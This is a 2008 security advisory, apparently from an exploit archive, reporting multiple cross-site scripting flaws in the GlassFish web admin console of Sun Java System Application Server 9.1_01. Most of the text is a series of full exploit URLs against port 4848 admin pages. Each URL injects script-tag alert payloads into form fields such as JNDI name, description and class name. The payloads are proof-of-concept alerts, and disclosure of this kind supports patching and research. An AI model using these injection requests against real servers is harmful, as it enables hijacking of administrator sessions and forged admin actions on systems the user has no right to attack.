Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1

==============================

Muitiple XSS - Glassfish Web Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 14 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability affect some webpages in the glassfish webadmin interface,
that vulnerability allow user can insert a malicious or a not expected input
data in the input type field.That was found in 10+ input data field in
glassfish.

This is a vulnerable URL:

http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3
Aproper
tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyCon
tentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscrip
t%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3A
property
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealer
t%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty
Sheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Eal
ert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproper
tySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%2
7%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aprop
ertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=cus
tomresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.View
State=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyF
orm%3Apr
opertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm
%3Aprope
rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyCo
ntentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscri
pt%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3
Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Eale
rt%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ea
lert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aprope
rtySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Eale
rt%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27
%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3Aprope
rtSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyCont
entPage%
3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_
hidden&j
avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_f
ocusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3
Apropert
yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyShee
t%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3
B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnamePr
op%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3Aprop
ertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&prop
ertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3
Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSe
ctionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%
3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Ac
ol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=prop
ertyForm
_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_Focus
Manager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButt
on

http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3A
property
ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet
%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C
%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3
AresType
=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3Ageneral
Property
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3
E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbo
x9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%
3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=
32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2
&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&pr
opertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&
property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&pr
opertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3A
basicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3Arow
Group1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3A
col3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hi
dden=pro
pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_u
til_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%

http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3Ap
ropertyC
ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%
3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&p
ropertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=
__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp
%3Adesc=
<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSe
ctionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcreso
urcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id1
85%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aprope
rtyConte
ntPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm
%3Aprope
rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Ana
me=<scri
pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertyS
heet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2')
;</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTe
xtField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertyShe
et%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');<
/script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionText
Field%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apr
opertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyC
ontentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecycle
modules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id1
17%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Aprope
rtyConte
ntPage%3AbottomButtons%3AsaveButton2

http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyF
orm%3Apr
opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3Aproper
tyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>a
lert('xs
s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Agenera
lPropert
ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyF
orm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<
script>a
lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.htm
l&proper
tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&c
om_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage
%3AtopBu
ttons%3AnextButton

And others =)

-- 
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds